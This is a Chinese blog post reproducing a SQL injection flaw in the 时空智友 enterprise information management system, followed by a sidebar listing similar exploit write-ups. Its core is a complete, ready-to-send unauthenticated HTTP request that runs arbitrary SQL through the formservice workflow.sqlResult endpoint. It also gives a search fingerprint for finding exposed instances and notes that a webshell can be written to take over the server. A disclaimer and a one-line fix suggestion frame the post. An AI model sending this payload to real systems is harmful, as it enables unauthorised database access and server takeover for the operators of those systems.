时空智友企业信息管理系统 SQL注入漏洞复现

最新推荐文章于 2025-04-08 14:39:24 发布
最新推荐文章于 2025-04-08 14:39:24 发布
阅读量1.6k 收藏 2
点赞数 1
文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/133026453
版权

前言

此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!

一、产品简介

时空智友企业流程化管控系统是一款企业信息管理软件,致力于协助大健康企业构建内部信息化,解决GSP管理、多组织管理、财务管理、税控管理、线上线下一体化等问题。 该系统可以帮助企业实现流程化管控,提高工作效率和管理水平。

二、漏洞描述

目前该系统存在SQL注入漏洞,攻击者通过恶意构造的SQL查询来执行未经授权的数据库操作。当应用程序未能正确验证、转义或过滤用户提供的输入数据时,攻击者可以利用这个漏洞来执行恶意的SQL语句,从而获取系统数据以及获得系统控制权限。

三、影响范围

版本<=11.0

四、复现环境

body=“时空智友企业信息管理”

五、漏洞复现

1.访问存在漏洞的网站,抓包
在这里插入图片描述

2.POC

POST /formservice?service=workflow.sqlResult HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 50

{"params": {"a": "11"}, "sql": "select db_name()"}

3.测试成功
在这里插入图片描述

六、漏洞利用

通过特定条件可写入webshell,获得服务器权限。

七、修复建议

及时将此系统放进内网,联系厂商进行加固

参考链接

https://mp.weixin.qq.com/s?__biz=MzIxMTg1ODAwNw==&mid=2247497065&idx=1&sn=eff4d58dab82ff44562b93e88cd7d41a&chksm=974c5251a03bdb47f73f383083865a55250076bc6e63c81a74d7197679b8bd89679971158db8&from=industrynews&version=4.1.9.6041&platform=win#rd

明丨通
关注
时空KSOA SQL注入漏洞复现
0xSec
08-13 2777
时空KSOA /servlet/com.sksoft.v8.trans.servlet.TaskRequestServlet接口和/servlet/imagefield接口处存在sql注入漏洞,未经身份认证的攻击者可通过该漏洞获取数据库敏感信息及凭证,最终可能导致服务器失陷。
SQL注入漏洞复现(CVE-2017-8917)
m0_56578216的博客
08-30 910
前提条件:1.Docker Compose是 docker 提供的一个命令行工具,用来定义和运行由多个容器组成的应用,而docker-compose.yml是它的配置文件。
SQL注入漏洞复现
若有战,召必回
10-24 833
其免费开源的特性使得用户可以根据自己的需求进行二次开发和定制改造,从而更好地满足企业的管理需求。那么如果我们将nickNname传入恶意的sql语句进行base64编码,就会绕过rockClass.php中的__construct方法中的sql语句的过滤,该方法是通过get方法依次获取请求中的moblie、xcytype、nickname等参数,并将这些参数赋值给uarr数组中,所以,如果没有进行登陆,我们需要给m、d、a三个参数分别传入相对应的值。该方法中并没有对sql语句进行过滤。
SQL注入攻击复现实验
最新发布
m0_74579330的博客
04-08 1405
SQL 注入是通过在用户输入或其他外部输入的数据中注入恶意的 SQL 语句,利用应用程序对用户输入处理不当的漏洞,改变原本 SQL 语句的逻辑,从而获取数据库中的敏感信息、篡改数据或者执行其他非法操作。在在浏览器输入127.0.0.1/denglu.html,访问html网页,在用户名输入框和密码输入框中输入“'or'1'='1”,此时显示登录失败,防护成功。输入我们在数据库中写入的用户名和密码,不直接跳转php页面,反而下载php网页的代码。查看php代码中执行的SQL语句,分析异常情况。
sql注入漏洞复现
yfy0308的博客
08-06 981
id=-1’ uninon select 1,2,3 第一件事,闭合单引号,摆脱单引号控制id=-1’是原因:有时网页往往只能一行数据,所以我们要让前面第一个select语句的返回值为空,才能让后面的第二个select语句回显出数据。2个办法,继续把多出来的单引号闭合或者注释mysql注释符:–空格(%20) # /***/ */ #会被浏览器编码,所以要写成%23你需要知道联合查询的列数,求当前表的列数(我们用注入获取数据库中的数据。在进行联合查询前,我们必须知道当前表的字段数。
时空企业流程管控系统文件上传漏洞复现
0xSec
08-22 3169
时空企业流程管控系统 formservice接口处存在任意文件上传漏洞,未经认证的攻击者可通过此接口上传后门文件,最终可导致服务器失陷。
时空KSOA 多处 SQL注入漏洞复现
0xSec
07-31 915
时空KSOA系统 PrintZP.jsp、PrintZPFB.jsp、PrintZPYG.jsp、PrintZPZP.jsp、fillKP.jsp等多处接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
时空KSOA PreviewKPQT SQL注入漏洞复现
0xSec
07-25 3457
时空KSOA PreviewKPQT.jsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
时空企业流程管控系统formserviceSQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-17 233
时空企业流程管控系统formserviceSQL注入漏洞(含批量验证poc)
SuiteCRM SQL注入漏洞复现(CVE-2024-36412)
0xSec
07-14 1179
SuiteCRM存在SQL注入漏洞,未经身份验证的远程攻击者可以通过该漏洞拼接执行SQL注入语句,从而获取数据库敏感信息。
时空企业流程管控系统 formservice SQL注入漏洞(含批量验证poc)
weixin_43567873的博客
04-28 211
时空企业流程管控系统 formservice SQL注入漏洞(含批量验证poc)
GeoServer SQL注入漏洞复现(CVE-2023-25157)
0xSec
06-09 8242
GeoServer在预览图层的时候,可以对图层进行数据过滤从而渲染出指定位置的图层。由于未对用户输入进行过滤,在使用需要以数据库作为数据存储的功能时,攻击者可以构造畸形的过滤语法,绕过GeoServer的词法解析从而造成SQL注入,获取服务器中的敏感信息,甚至可能获取数据库服务器权限。
Casdoor SQL注入漏洞复现,编号:CVE-2022-24124
08-31 3040
漏洞属于Sql注入漏洞,在查询API 存在与字段和值参数相关的SQL 注入漏洞,如api/get-organizations 所示。
WeiPHP5.0 SQL注入(CNVD-2020-67556 )漏洞复现
weixin_68999845的博客
09-21 811
WeiPHP5.0 SQL注入(CNVD-2020-67556 ) 漏洞复现
GeoServer SQL 注入漏洞复现(CVE-2023-25157)附poc_geoserverl漏洞
2401_84240129的博客
05-16 1625
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
【CVE-2020-9483】Apache SkyWalking 存在的SQL注入漏洞复现
weixin_43923736的博客
06-02 2085
【CVE-2020-9483】Apache SkyWalking 存在的SQL注入漏洞复现
YxtCMF SQL注入 漏洞复现
weixin_51681694的博客
05-03 670
复现的时候被某个实验室写的漏洞文章坑了,插桩插了半天也没见断下来,睡了一觉自己去审才发现那篇文章漏洞点找错了........
CVE-2021-35042 Django SQL注入漏洞复现
weixin_43047908的博客
08-18 4863
目录前言漏洞环境搭建漏洞复现 前言 Django是一个开放源代码的Web应用框架,由Python写成。采用了MVC的框架模式,即模型M,视图V和控制器C。它最初是被开发来用于管理劳伦斯出版集团旗下的一些以新闻内容为主的网站的,即是CMS(内容管理系统)软件。 Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。 1、用户认证:不需要用户认证
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值